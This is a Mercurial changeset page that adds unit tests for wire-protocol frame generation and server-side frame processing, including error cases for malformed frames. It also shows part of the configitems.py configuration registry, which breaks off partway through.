##// END OF EJS Templates
wireproto: implement basic frame reading and processing...
Gregory Szorc -
r37070:8c3c4736 default
parent child Browse files
Show More
@@ -0,0 +1,275 b''
1 from __future__ import absolute_import, print_function
2
3 import unittest
4
5 from mercurial import (
6 util,
7 wireprotoframing as framing,
8 )
9
# Shorthand for building a frame from its human-readable description.
ffs = framing.makeframefromhumanstring

def makereactor():
    """Create a fresh server reactor instance for a test."""
    return framing.serverreactor()
14
def sendframes(reactor, gen):
    """Send a generator of frame bytearray to a reactor.

    Each frame is split into its header and payload before being fed to
    the reactor, mirroring what a transport would do.

    Emits a generator of results from ``onframerecv()`` calls.
    """
    for frame in gen:
        frametype, frameflags, framelength = framing.parseheader(frame)
        payload = frame[framing.FRAME_HEADER_SIZE:]
        # Sanity check that the header's advertised length matches reality.
        assert len(payload) == framelength

        yield reactor.onframerecv(frametype, frameflags, payload)
26
def sendcommandframes(reactor, cmd, args, datafh=None):
    """Generate frames to run a command and send them to a reactor.

    Returns the generator of per-frame reactor results (see ``sendframes``).
    """
    return sendframes(reactor, framing.createcommandframes(cmd, args, datafh))
30
class FrameTests(unittest.TestCase):
    """Tests for frame generation from commands, arguments and data."""

    def testdataexactframesize(self):
        """Data payload exactly one frame long still emits a trailing eos."""
        data = util.bytesio(b'x' * framing.DEFAULT_MAX_FRAME_SIZE)

        frames = list(framing.createcommandframes(b'command', {}, data))
        self.assertEqual(frames, [
            ffs(b'command-name have-data command'),
            ffs(b'command-data continuation %s' % data.getvalue()),
            ffs(b'command-data eos ')
        ])

    def testdatamultipleframes(self):
        """Data one byte beyond the frame limit spills into a second frame."""
        data = util.bytesio(b'x' * (framing.DEFAULT_MAX_FRAME_SIZE + 1))
        frames = list(framing.createcommandframes(b'command', {}, data))
        self.assertEqual(frames, [
            ffs(b'command-name have-data command'),
            ffs(b'command-data continuation %s' % (
                b'x' * framing.DEFAULT_MAX_FRAME_SIZE)),
            ffs(b'command-data eos x'),
        ])

    def testargsanddata(self):
        """Arguments and data frames are emitted in the expected order."""
        data = util.bytesio(b'x' * 100)

        frames = list(framing.createcommandframes(b'command', {
            b'key1': b'key1value',
            b'key2': b'key2value',
            b'key3': b'key3value',
        }, data))

        self.assertEqual(frames, [
            ffs(b'command-name have-args|have-data command'),
            ffs(br'command-argument 0 \x04\x00\x09\x00key1key1value'),
            ffs(br'command-argument 0 \x04\x00\x09\x00key2key2value'),
            ffs(br'command-argument eoa \x04\x00\x09\x00key3key3value'),
            ffs(b'command-data eos %s' % data.getvalue()),
        ])
68
class ServerReactorTests(unittest.TestCase):
    """Tests for the server reactor's frame-processing state machine."""

    def _sendsingleframe(self, reactor, s):
        """Send one human-described frame; return the single reactor result."""
        results = list(sendframes(reactor, [ffs(s)]))
        self.assertEqual(len(results), 1)

        return results[0]

    def assertaction(self, res, expected):
        """Assert a reactor result is an (action, metadata dict) pair."""
        self.assertIsInstance(res, tuple)
        self.assertEqual(len(res), 2)
        self.assertIsInstance(res[1], dict)
        self.assertEqual(res[0], expected)

    def test1framecommand(self):
        """Receiving a command in a single frame yields request to run it."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand', {}))
        self.assertEqual(len(results), 1)
        self.assertaction(results[0], 'runcommand')
        self.assertEqual(results[0][1], {
            'command': b'mycommand',
            'args': {},
            'data': None,
        })

    def test1argument(self):
        """A single argument frame is buffered before the command runs."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand',
                                         {b'foo': b'bar'}))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'runcommand')
        self.assertEqual(results[1][1], {
            'command': b'mycommand',
            'args': {b'foo': b'bar'},
            'data': None,
        })

    def testmultiarguments(self):
        """Multiple argument frames are all buffered before execution."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand',
                                         {b'foo': b'bar', b'biz': b'baz'}))
        self.assertEqual(len(results), 3)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'wantframe')
        self.assertaction(results[2], 'runcommand')
        self.assertEqual(results[2][1], {
            'command': b'mycommand',
            'args': {b'foo': b'bar', b'biz': b'baz'},
            'data': None,
        })

    def testsimplecommanddata(self):
        """A single data frame is accumulated and handed to the command."""
        reactor = makereactor()
        results = list(sendcommandframes(reactor, b'mycommand', {},
                                         util.bytesio(b'data!')))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'runcommand')
        self.assertEqual(results[1][1], {
            'command': b'mycommand',
            'args': {},
            'data': b'data!',
        })

    def testmultipledataframes(self):
        """Continuation data frames are concatenated until eos."""
        frames = [
            ffs(b'command-name have-data mycommand'),
            ffs(b'command-data continuation data1'),
            ffs(b'command-data continuation data2'),
            ffs(b'command-data eos data3'),
        ]

        reactor = makereactor()
        results = list(sendframes(reactor, frames))
        self.assertEqual(len(results), 4)
        for i in range(3):
            self.assertaction(results[i], 'wantframe')
        self.assertaction(results[3], 'runcommand')
        self.assertEqual(results[3][1], {
            'command': b'mycommand',
            'args': {},
            'data': b'data1data2data3',
        })

    def testargumentanddata(self):
        """Argument frames followed by data frames produce a full request."""
        frames = [
            ffs(b'command-name have-args|have-data command'),
            ffs(br'command-argument 0 \x03\x00\x03\x00keyval'),
            ffs(br'command-argument eoa \x03\x00\x03\x00foobar'),
            ffs(b'command-data continuation value1'),
            ffs(b'command-data eos value2'),
        ]

        reactor = makereactor()
        results = list(sendframes(reactor, frames))

        self.assertaction(results[-1], 'runcommand')
        self.assertEqual(results[-1][1], {
            'command': b'command',
            'args': {
                b'key': b'val',
                b'foo': b'bar',
            },
            'data': b'value1value2',
        })

    def testunexpectedcommandargument(self):
        """Command argument frame when not running a command is an error."""
        result = self._sendsingleframe(makereactor(),
                                       b'command-argument 0 ignored')
        self.assertaction(result, 'error')
        self.assertEqual(result[1], {
            'message': b'expected command frame; got 2',
        })

    def testunexpectedcommanddata(self):
        """Command data frame when not running a command is an error."""
        result = self._sendsingleframe(makereactor(),
                                       b'command-data 0 ignored')
        self.assertaction(result, 'error')
        self.assertEqual(result[1], {
            'message': b'expected command frame; got 3',
        })

    def testmissingcommandframeflags(self):
        """Command name frame must have flags set."""
        result = self._sendsingleframe(makereactor(),
                                       b'command-name 0 command')
        self.assertaction(result, 'error')
        self.assertEqual(result[1], {
            'message': b'missing frame flags on command frame',
        })

    def testmissingargumentframe(self):
        """A non-argument frame while arguments are expected is an error."""
        frames = [
            ffs(b'command-name have-args command'),
            ffs(b'command-name 0 ignored'),
        ]

        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'expected command argument frame; got 1',
        })

    def testincompleteargumentname(self):
        """Argument frame with incomplete name."""
        frames = [
            ffs(b'command-name have-args command1'),
            ffs(br'command-argument eoa \x04\x00\xde\xadfoo'),
        ]

        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'malformed argument frame: partial argument name',
        })

    def testincompleteargumentvalue(self):
        """Argument frame with incomplete value."""
        frames = [
            ffs(b'command-name have-args command'),
            ffs(br'command-argument eoa \x03\x00\xaa\xaafoopartialvalue'),
        ]

        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'malformed argument frame: partial argument value',
        })

    def testmissingcommanddataframe(self):
        """A non-data frame while data is expected is an error."""
        frames = [
            ffs(b'command-name have-data command1'),
            ffs(b'command-name eos command2'),
        ]
        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'expected command data frame; got 1',
        })

    def testmissingcommanddataframeflags(self):
        """A data frame with no flags set is an error."""
        frames = [
            ffs(b'command-name have-data command1'),
            ffs(b'command-data 0 data'),
        ]
        results = list(sendframes(makereactor(), frames))
        self.assertEqual(len(results), 2)
        self.assertaction(results[0], 'wantframe')
        self.assertaction(results[1], 'error')
        self.assertEqual(results[1][1], {
            'message': b'command data frame without flags',
        })
272
if __name__ == '__main__':
    # silenttestrunner is a Mercurial test-suite helper that suppresses
    # unittest's usual per-test output.
    import silenttestrunner
    silenttestrunner.main(__name__)
@@ -1,1317 +1,1320 b''
1 # configitems.py - centralized declaration of configuration option
1 # configitems.py - centralized declaration of configuration option
2 #
2 #
3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import functools
10 import functools
11 import re
11 import re
12
12
13 from . import (
13 from . import (
14 encoding,
14 encoding,
15 error,
15 error,
16 )
16 )
17
17
def loadconfigtable(ui, extname, configtable):
    """update config item known to the ui with the extension ones

    ``configtable`` maps section names to {name: configitem} mappings.
    Items already registered by core (or another extension) trigger a
    devel warning before being overwritten.
    """
    for section, items in sorted(configtable.items()):
        knownitems = ui._knownconfig.setdefault(section, itemregister())
        knownkeys = set(knownitems)
        newkeys = set(items)
        # Warn about collisions before the update clobbers them.
        for key in sorted(knownkeys & newkeys):
            msg = "extension '%s' overwrite config item '%s.%s'"
            msg %= (extname, section, key)
            ui.develwarn(msg, config='warn-config')

        knownitems.update(items)
class configitem(object):
    """represent a known config item

    :section: the official config section where to find this item,
    :name: the official name within the section,
    :default: default value for this item,
    :alias: optional list of tuples as alternatives,
    :generic: this is a generic definition, match name using regular expression.
    """

    def __init__(self, section, name, default=None, alias=(),
                 generic=False, priority=0):
        self.section = section
        self.name = name
        self.default = default
        self.alias = list(alias)
        self.generic = generic
        # priority orders generic items during lookup (see itemregister.get)
        self.priority = priority
        # Pre-compiled pattern for generic items; None for exact names.
        self._re = None
        if generic:
            self._re = re.compile(self.name)
class itemregister(dict):
    """A specialized dictionary that can handle wild-card selection"""

    def __init__(self):
        super(itemregister, self).__init__()
        # Items whose name is a regular expression, kept separately so
        # ``get`` can fall back to pattern matching.
        self._generics = set()

    def update(self, other):
        # ``other`` must itself be an itemregister so generics propagate.
        super(itemregister, self).update(other)
        self._generics.update(other._generics)

    def __setitem__(self, key, item):
        super(itemregister, self).__setitem__(key, item)
        if item.generic:
            self._generics.add(item)

    def get(self, key):
        baseitem = super(itemregister, self).get(key)
        if baseitem is not None and not baseitem.generic:
            return baseitem

        # search for a matching generic item
        generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
        for item in generics:
            # we use 'match' instead of 'search' to make the matching simpler
            # for people unfamiliar with regular expression. Having the match
            # rooted to the start of the string will produce less surprising
            # result for user writing simple regex for sub-attribute.
            #
            # For example using "color\..*" match produces an unsurprising
            # result, while using search could suddenly match apparently
            # unrelated configuration that happens to contains "color."
            # anywhere. This is a tradeoff where we favor requiring ".*" on
            # some match to avoid the need to prefix most pattern with "^".
            # The "^" seems more error prone.
            if item._re.match(key):
                return item

        return None
# Registry of core config items, filled in below via coreconfigitem.
coreitems = {}

def _register(configtable, *args, **kwargs):
    """Create a configitem from *args/**kwargs and add it to configtable.

    Raises ProgrammingError on duplicate registration of the same
    section/name pair.
    """
    item = configitem(*args, **kwargs)
    section = configtable.setdefault(item.section, itemregister())
    if item.name in section:
        msg = "duplicated config item registration for '%s.%s'"
        raise error.ProgrammingError(msg % (item.section, item.name))
    section[item.name] = item
# special value for case where the default is derived from other values
dynamicdefault = object()

# Registering actual config items

def getitemregister(configtable):
    """Return a registration function bound to ``configtable``.

    The returned callable has the same signature as ``configitem`` and
    exposes ``dynamicdefault`` as an attribute, pseudo-enum style.
    """
    f = functools.partial(_register, configtable)
    # export pseudo enum as configitem.*
    f.dynamicdefault = dynamicdefault
    return f

coreconfigitem = getitemregister(coreitems)
115
115
116 coreconfigitem('alias', '.*',
116 coreconfigitem('alias', '.*',
117 default=None,
117 default=None,
118 generic=True,
118 generic=True,
119 )
119 )
120 coreconfigitem('annotate', 'nodates',
120 coreconfigitem('annotate', 'nodates',
121 default=False,
121 default=False,
122 )
122 )
123 coreconfigitem('annotate', 'showfunc',
123 coreconfigitem('annotate', 'showfunc',
124 default=False,
124 default=False,
125 )
125 )
126 coreconfigitem('annotate', 'unified',
126 coreconfigitem('annotate', 'unified',
127 default=None,
127 default=None,
128 )
128 )
129 coreconfigitem('annotate', 'git',
129 coreconfigitem('annotate', 'git',
130 default=False,
130 default=False,
131 )
131 )
132 coreconfigitem('annotate', 'ignorews',
132 coreconfigitem('annotate', 'ignorews',
133 default=False,
133 default=False,
134 )
134 )
135 coreconfigitem('annotate', 'ignorewsamount',
135 coreconfigitem('annotate', 'ignorewsamount',
136 default=False,
136 default=False,
137 )
137 )
138 coreconfigitem('annotate', 'ignoreblanklines',
138 coreconfigitem('annotate', 'ignoreblanklines',
139 default=False,
139 default=False,
140 )
140 )
141 coreconfigitem('annotate', 'ignorewseol',
141 coreconfigitem('annotate', 'ignorewseol',
142 default=False,
142 default=False,
143 )
143 )
144 coreconfigitem('annotate', 'nobinary',
144 coreconfigitem('annotate', 'nobinary',
145 default=False,
145 default=False,
146 )
146 )
147 coreconfigitem('annotate', 'noprefix',
147 coreconfigitem('annotate', 'noprefix',
148 default=False,
148 default=False,
149 )
149 )
150 coreconfigitem('auth', 'cookiefile',
150 coreconfigitem('auth', 'cookiefile',
151 default=None,
151 default=None,
152 )
152 )
153 # bookmarks.pushing: internal hack for discovery
153 # bookmarks.pushing: internal hack for discovery
154 coreconfigitem('bookmarks', 'pushing',
154 coreconfigitem('bookmarks', 'pushing',
155 default=list,
155 default=list,
156 )
156 )
157 # bundle.mainreporoot: internal hack for bundlerepo
157 # bundle.mainreporoot: internal hack for bundlerepo
158 coreconfigitem('bundle', 'mainreporoot',
158 coreconfigitem('bundle', 'mainreporoot',
159 default='',
159 default='',
160 )
160 )
161 # bundle.reorder: experimental config
161 # bundle.reorder: experimental config
162 coreconfigitem('bundle', 'reorder',
162 coreconfigitem('bundle', 'reorder',
163 default='auto',
163 default='auto',
164 )
164 )
165 coreconfigitem('censor', 'policy',
165 coreconfigitem('censor', 'policy',
166 default='abort',
166 default='abort',
167 )
167 )
168 coreconfigitem('chgserver', 'idletimeout',
168 coreconfigitem('chgserver', 'idletimeout',
169 default=3600,
169 default=3600,
170 )
170 )
171 coreconfigitem('chgserver', 'skiphash',
171 coreconfigitem('chgserver', 'skiphash',
172 default=False,
172 default=False,
173 )
173 )
174 coreconfigitem('cmdserver', 'log',
174 coreconfigitem('cmdserver', 'log',
175 default=None,
175 default=None,
176 )
176 )
177 coreconfigitem('color', '.*',
177 coreconfigitem('color', '.*',
178 default=None,
178 default=None,
179 generic=True,
179 generic=True,
180 )
180 )
181 coreconfigitem('color', 'mode',
181 coreconfigitem('color', 'mode',
182 default='auto',
182 default='auto',
183 )
183 )
184 coreconfigitem('color', 'pagermode',
184 coreconfigitem('color', 'pagermode',
185 default=dynamicdefault,
185 default=dynamicdefault,
186 )
186 )
187 coreconfigitem('commands', 'show.aliasprefix',
187 coreconfigitem('commands', 'show.aliasprefix',
188 default=list,
188 default=list,
189 )
189 )
190 coreconfigitem('commands', 'status.relative',
190 coreconfigitem('commands', 'status.relative',
191 default=False,
191 default=False,
192 )
192 )
193 coreconfigitem('commands', 'status.skipstates',
193 coreconfigitem('commands', 'status.skipstates',
194 default=[],
194 default=[],
195 )
195 )
196 coreconfigitem('commands', 'status.verbose',
196 coreconfigitem('commands', 'status.verbose',
197 default=False,
197 default=False,
198 )
198 )
199 coreconfigitem('commands', 'update.check',
199 coreconfigitem('commands', 'update.check',
200 default=None,
200 default=None,
201 # Deprecated, remove after 4.4 release
201 # Deprecated, remove after 4.4 release
202 alias=[('experimental', 'updatecheck')]
202 alias=[('experimental', 'updatecheck')]
203 )
203 )
204 coreconfigitem('commands', 'update.requiredest',
204 coreconfigitem('commands', 'update.requiredest',
205 default=False,
205 default=False,
206 )
206 )
207 coreconfigitem('committemplate', '.*',
207 coreconfigitem('committemplate', '.*',
208 default=None,
208 default=None,
209 generic=True,
209 generic=True,
210 )
210 )
211 coreconfigitem('convert', 'cvsps.cache',
211 coreconfigitem('convert', 'cvsps.cache',
212 default=True,
212 default=True,
213 )
213 )
214 coreconfigitem('convert', 'cvsps.fuzz',
214 coreconfigitem('convert', 'cvsps.fuzz',
215 default=60,
215 default=60,
216 )
216 )
217 coreconfigitem('convert', 'cvsps.logencoding',
217 coreconfigitem('convert', 'cvsps.logencoding',
218 default=None,
218 default=None,
219 )
219 )
220 coreconfigitem('convert', 'cvsps.mergefrom',
220 coreconfigitem('convert', 'cvsps.mergefrom',
221 default=None,
221 default=None,
222 )
222 )
223 coreconfigitem('convert', 'cvsps.mergeto',
223 coreconfigitem('convert', 'cvsps.mergeto',
224 default=None,
224 default=None,
225 )
225 )
226 coreconfigitem('convert', 'git.committeractions',
226 coreconfigitem('convert', 'git.committeractions',
227 default=lambda: ['messagedifferent'],
227 default=lambda: ['messagedifferent'],
228 )
228 )
229 coreconfigitem('convert', 'git.extrakeys',
229 coreconfigitem('convert', 'git.extrakeys',
230 default=list,
230 default=list,
231 )
231 )
232 coreconfigitem('convert', 'git.findcopiesharder',
232 coreconfigitem('convert', 'git.findcopiesharder',
233 default=False,
233 default=False,
234 )
234 )
235 coreconfigitem('convert', 'git.remoteprefix',
235 coreconfigitem('convert', 'git.remoteprefix',
236 default='remote',
236 default='remote',
237 )
237 )
238 coreconfigitem('convert', 'git.renamelimit',
238 coreconfigitem('convert', 'git.renamelimit',
239 default=400,
239 default=400,
240 )
240 )
241 coreconfigitem('convert', 'git.saverev',
241 coreconfigitem('convert', 'git.saverev',
242 default=True,
242 default=True,
243 )
243 )
244 coreconfigitem('convert', 'git.similarity',
244 coreconfigitem('convert', 'git.similarity',
245 default=50,
245 default=50,
246 )
246 )
247 coreconfigitem('convert', 'git.skipsubmodules',
247 coreconfigitem('convert', 'git.skipsubmodules',
248 default=False,
248 default=False,
249 )
249 )
250 coreconfigitem('convert', 'hg.clonebranches',
250 coreconfigitem('convert', 'hg.clonebranches',
251 default=False,
251 default=False,
252 )
252 )
253 coreconfigitem('convert', 'hg.ignoreerrors',
253 coreconfigitem('convert', 'hg.ignoreerrors',
254 default=False,
254 default=False,
255 )
255 )
256 coreconfigitem('convert', 'hg.revs',
256 coreconfigitem('convert', 'hg.revs',
257 default=None,
257 default=None,
258 )
258 )
259 coreconfigitem('convert', 'hg.saverev',
259 coreconfigitem('convert', 'hg.saverev',
260 default=False,
260 default=False,
261 )
261 )
262 coreconfigitem('convert', 'hg.sourcename',
262 coreconfigitem('convert', 'hg.sourcename',
263 default=None,
263 default=None,
264 )
264 )
265 coreconfigitem('convert', 'hg.startrev',
265 coreconfigitem('convert', 'hg.startrev',
266 default=None,
266 default=None,
267 )
267 )
268 coreconfigitem('convert', 'hg.tagsbranch',
268 coreconfigitem('convert', 'hg.tagsbranch',
269 default='default',
269 default='default',
270 )
270 )
271 coreconfigitem('convert', 'hg.usebranchnames',
271 coreconfigitem('convert', 'hg.usebranchnames',
272 default=True,
272 default=True,
273 )
273 )
274 coreconfigitem('convert', 'ignoreancestorcheck',
274 coreconfigitem('convert', 'ignoreancestorcheck',
275 default=False,
275 default=False,
276 )
276 )
277 coreconfigitem('convert', 'localtimezone',
277 coreconfigitem('convert', 'localtimezone',
278 default=False,
278 default=False,
279 )
279 )
280 coreconfigitem('convert', 'p4.encoding',
280 coreconfigitem('convert', 'p4.encoding',
281 default=dynamicdefault,
281 default=dynamicdefault,
282 )
282 )
283 coreconfigitem('convert', 'p4.startrev',
283 coreconfigitem('convert', 'p4.startrev',
284 default=0,
284 default=0,
285 )
285 )
286 coreconfigitem('convert', 'skiptags',
286 coreconfigitem('convert', 'skiptags',
287 default=False,
287 default=False,
288 )
288 )
289 coreconfigitem('convert', 'svn.debugsvnlog',
289 coreconfigitem('convert', 'svn.debugsvnlog',
290 default=True,
290 default=True,
291 )
291 )
292 coreconfigitem('convert', 'svn.trunk',
292 coreconfigitem('convert', 'svn.trunk',
293 default=None,
293 default=None,
294 )
294 )
295 coreconfigitem('convert', 'svn.tags',
295 coreconfigitem('convert', 'svn.tags',
296 default=None,
296 default=None,
297 )
297 )
298 coreconfigitem('convert', 'svn.branches',
298 coreconfigitem('convert', 'svn.branches',
299 default=None,
299 default=None,
300 )
300 )
301 coreconfigitem('convert', 'svn.startrev',
301 coreconfigitem('convert', 'svn.startrev',
302 default=0,
302 default=0,
303 )
303 )
304 coreconfigitem('debug', 'dirstate.delaywrite',
304 coreconfigitem('debug', 'dirstate.delaywrite',
305 default=0,
305 default=0,
306 )
306 )
307 coreconfigitem('defaults', '.*',
307 coreconfigitem('defaults', '.*',
308 default=None,
308 default=None,
309 generic=True,
309 generic=True,
310 )
310 )
311 coreconfigitem('devel', 'all-warnings',
311 coreconfigitem('devel', 'all-warnings',
312 default=False,
312 default=False,
313 )
313 )
314 coreconfigitem('devel', 'bundle2.debug',
314 coreconfigitem('devel', 'bundle2.debug',
315 default=False,
315 default=False,
316 )
316 )
317 coreconfigitem('devel', 'cache-vfs',
317 coreconfigitem('devel', 'cache-vfs',
318 default=None,
318 default=None,
319 )
319 )
320 coreconfigitem('devel', 'check-locks',
320 coreconfigitem('devel', 'check-locks',
321 default=False,
321 default=False,
322 )
322 )
323 coreconfigitem('devel', 'check-relroot',
323 coreconfigitem('devel', 'check-relroot',
324 default=False,
324 default=False,
325 )
325 )
326 coreconfigitem('devel', 'default-date',
326 coreconfigitem('devel', 'default-date',
327 default=None,
327 default=None,
328 )
328 )
329 coreconfigitem('devel', 'deprec-warn',
329 coreconfigitem('devel', 'deprec-warn',
330 default=False,
330 default=False,
331 )
331 )
332 coreconfigitem('devel', 'disableloaddefaultcerts',
332 coreconfigitem('devel', 'disableloaddefaultcerts',
333 default=False,
333 default=False,
334 )
334 )
335 coreconfigitem('devel', 'warn-empty-changegroup',
335 coreconfigitem('devel', 'warn-empty-changegroup',
336 default=False,
336 default=False,
337 )
337 )
338 coreconfigitem('devel', 'legacy.exchange',
338 coreconfigitem('devel', 'legacy.exchange',
339 default=list,
339 default=list,
340 )
340 )
341 coreconfigitem('devel', 'servercafile',
341 coreconfigitem('devel', 'servercafile',
342 default='',
342 default='',
343 )
343 )
344 coreconfigitem('devel', 'serverexactprotocol',
344 coreconfigitem('devel', 'serverexactprotocol',
345 default='',
345 default='',
346 )
346 )
347 coreconfigitem('devel', 'serverrequirecert',
347 coreconfigitem('devel', 'serverrequirecert',
348 default=False,
348 default=False,
349 )
349 )
350 coreconfigitem('devel', 'strip-obsmarkers',
350 coreconfigitem('devel', 'strip-obsmarkers',
351 default=True,
351 default=True,
352 )
352 )
353 coreconfigitem('devel', 'warn-config',
353 coreconfigitem('devel', 'warn-config',
354 default=None,
354 default=None,
355 )
355 )
356 coreconfigitem('devel', 'warn-config-default',
356 coreconfigitem('devel', 'warn-config-default',
357 default=None,
357 default=None,
358 )
358 )
359 coreconfigitem('devel', 'user.obsmarker',
359 coreconfigitem('devel', 'user.obsmarker',
360 default=None,
360 default=None,
361 )
361 )
362 coreconfigitem('devel', 'warn-config-unknown',
362 coreconfigitem('devel', 'warn-config-unknown',
363 default=None,
363 default=None,
364 )
364 )
365 coreconfigitem('devel', 'debug.peer-request',
365 coreconfigitem('devel', 'debug.peer-request',
366 default=False,
366 default=False,
367 )
367 )
368 coreconfigitem('diff', 'nodates',
368 coreconfigitem('diff', 'nodates',
369 default=False,
369 default=False,
370 )
370 )
371 coreconfigitem('diff', 'showfunc',
371 coreconfigitem('diff', 'showfunc',
372 default=False,
372 default=False,
373 )
373 )
374 coreconfigitem('diff', 'unified',
374 coreconfigitem('diff', 'unified',
375 default=None,
375 default=None,
376 )
376 )
377 coreconfigitem('diff', 'git',
377 coreconfigitem('diff', 'git',
378 default=False,
378 default=False,
379 )
379 )
380 coreconfigitem('diff', 'ignorews',
380 coreconfigitem('diff', 'ignorews',
381 default=False,
381 default=False,
382 )
382 )
383 coreconfigitem('diff', 'ignorewsamount',
383 coreconfigitem('diff', 'ignorewsamount',
384 default=False,
384 default=False,
385 )
385 )
386 coreconfigitem('diff', 'ignoreblanklines',
386 coreconfigitem('diff', 'ignoreblanklines',
387 default=False,
387 default=False,
388 )
388 )
389 coreconfigitem('diff', 'ignorewseol',
389 coreconfigitem('diff', 'ignorewseol',
390 default=False,
390 default=False,
391 )
391 )
392 coreconfigitem('diff', 'nobinary',
392 coreconfigitem('diff', 'nobinary',
393 default=False,
393 default=False,
394 )
394 )
395 coreconfigitem('diff', 'noprefix',
395 coreconfigitem('diff', 'noprefix',
396 default=False,
396 default=False,
397 )
397 )
398 coreconfigitem('email', 'bcc',
398 coreconfigitem('email', 'bcc',
399 default=None,
399 default=None,
400 )
400 )
401 coreconfigitem('email', 'cc',
401 coreconfigitem('email', 'cc',
402 default=None,
402 default=None,
403 )
403 )
404 coreconfigitem('email', 'charsets',
404 coreconfigitem('email', 'charsets',
405 default=list,
405 default=list,
406 )
406 )
407 coreconfigitem('email', 'from',
407 coreconfigitem('email', 'from',
408 default=None,
408 default=None,
409 )
409 )
410 coreconfigitem('email', 'method',
410 coreconfigitem('email', 'method',
411 default='smtp',
411 default='smtp',
412 )
412 )
413 coreconfigitem('email', 'reply-to',
413 coreconfigitem('email', 'reply-to',
414 default=None,
414 default=None,
415 )
415 )
416 coreconfigitem('email', 'to',
416 coreconfigitem('email', 'to',
417 default=None,
417 default=None,
418 )
418 )
419 coreconfigitem('experimental', 'archivemetatemplate',
419 coreconfigitem('experimental', 'archivemetatemplate',
420 default=dynamicdefault,
420 default=dynamicdefault,
421 )
421 )
422 coreconfigitem('experimental', 'bundle-phases',
422 coreconfigitem('experimental', 'bundle-phases',
423 default=False,
423 default=False,
424 )
424 )
425 coreconfigitem('experimental', 'bundle2-advertise',
425 coreconfigitem('experimental', 'bundle2-advertise',
426 default=True,
426 default=True,
427 )
427 )
428 coreconfigitem('experimental', 'bundle2-output-capture',
428 coreconfigitem('experimental', 'bundle2-output-capture',
429 default=False,
429 default=False,
430 )
430 )
431 coreconfigitem('experimental', 'bundle2.pushback',
431 coreconfigitem('experimental', 'bundle2.pushback',
432 default=False,
432 default=False,
433 )
433 )
434 coreconfigitem('experimental', 'bundle2.stream',
434 coreconfigitem('experimental', 'bundle2.stream',
435 default=False,
435 default=False,
436 )
436 )
437 coreconfigitem('experimental', 'bundle2lazylocking',
437 coreconfigitem('experimental', 'bundle2lazylocking',
438 default=False,
438 default=False,
439 )
439 )
440 coreconfigitem('experimental', 'bundlecomplevel',
440 coreconfigitem('experimental', 'bundlecomplevel',
441 default=None,
441 default=None,
442 )
442 )
443 coreconfigitem('experimental', 'changegroup3',
443 coreconfigitem('experimental', 'changegroup3',
444 default=False,
444 default=False,
445 )
445 )
446 coreconfigitem('experimental', 'clientcompressionengines',
446 coreconfigitem('experimental', 'clientcompressionengines',
447 default=list,
447 default=list,
448 )
448 )
449 coreconfigitem('experimental', 'copytrace',
449 coreconfigitem('experimental', 'copytrace',
450 default='on',
450 default='on',
451 )
451 )
452 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
452 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
453 default=100,
453 default=100,
454 )
454 )
455 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
455 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
456 default=100,
456 default=100,
457 )
457 )
458 coreconfigitem('experimental', 'crecordtest',
458 coreconfigitem('experimental', 'crecordtest',
459 default=None,
459 default=None,
460 )
460 )
461 coreconfigitem('experimental', 'directaccess',
461 coreconfigitem('experimental', 'directaccess',
462 default=False,
462 default=False,
463 )
463 )
464 coreconfigitem('experimental', 'directaccess.revnums',
464 coreconfigitem('experimental', 'directaccess.revnums',
465 default=False,
465 default=False,
466 )
466 )
467 coreconfigitem('experimental', 'editortmpinhg',
467 coreconfigitem('experimental', 'editortmpinhg',
468 default=False,
468 default=False,
469 )
469 )
470 coreconfigitem('experimental', 'evolution',
470 coreconfigitem('experimental', 'evolution',
471 default=list,
471 default=list,
472 )
472 )
473 coreconfigitem('experimental', 'evolution.allowdivergence',
473 coreconfigitem('experimental', 'evolution.allowdivergence',
474 default=False,
474 default=False,
475 alias=[('experimental', 'allowdivergence')]
475 alias=[('experimental', 'allowdivergence')]
476 )
476 )
477 coreconfigitem('experimental', 'evolution.allowunstable',
477 coreconfigitem('experimental', 'evolution.allowunstable',
478 default=None,
478 default=None,
479 )
479 )
480 coreconfigitem('experimental', 'evolution.createmarkers',
480 coreconfigitem('experimental', 'evolution.createmarkers',
481 default=None,
481 default=None,
482 )
482 )
483 coreconfigitem('experimental', 'evolution.effect-flags',
483 coreconfigitem('experimental', 'evolution.effect-flags',
484 default=True,
484 default=True,
485 alias=[('experimental', 'effect-flags')]
485 alias=[('experimental', 'effect-flags')]
486 )
486 )
487 coreconfigitem('experimental', 'evolution.exchange',
487 coreconfigitem('experimental', 'evolution.exchange',
488 default=None,
488 default=None,
489 )
489 )
490 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
490 coreconfigitem('experimental', 'evolution.bundle-obsmarker',
491 default=False,
491 default=False,
492 )
492 )
493 coreconfigitem('experimental', 'evolution.report-instabilities',
493 coreconfigitem('experimental', 'evolution.report-instabilities',
494 default=True,
